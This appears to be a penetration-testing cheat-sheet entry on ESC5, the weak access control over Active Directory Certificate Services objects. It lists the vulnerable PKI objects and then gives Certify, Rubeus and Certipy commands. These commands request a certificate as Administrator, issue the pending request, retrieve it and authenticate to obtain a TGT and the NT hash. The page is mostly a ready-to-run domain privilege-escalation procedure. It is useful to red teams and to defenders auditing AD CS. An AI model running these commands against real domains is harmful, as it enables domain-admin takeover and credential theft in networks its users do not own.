ESC5
Vulnerable PKI Object Access Control
where the objects have the following requirements:
-
The AD computer object of the CA server, which may be compromised through mechanisms like S4U2Self or S4U2Proxy.
-
The RPC/DCOM server of the CA server.
-
Any descendant AD object or container within the specific container path CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>. This path includes, but is not limited to, containers and objects such as the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, and the Enrollment Services Container.
Windows
Request a Certificate using SubCA template
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template> /altname:Administrator
Download Pending Request
PS /home/bobbuilder> .\Certify.exe download /ca:<ca_name> /id:10
Convert pem to pfx
Request the TGT and the NT Hash
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials
Linux
Request a certificate as the Domain Administrator
bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca <ca_name> -template <template> -upn Administrator
Issue the requested certificate
We approve the previous request by specifying the request ID 10
with the option -issue-request 10
bob$ certipy ca -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca <ca_name> -issue-request 10
Retrieve the issued certificate
We can retrieve the certificate with the option -retrieve 10
bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca <ca_name> -retrieve 10
Authenticate with the Administrator Certificate
bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip> -ns <ip> -dns-tcp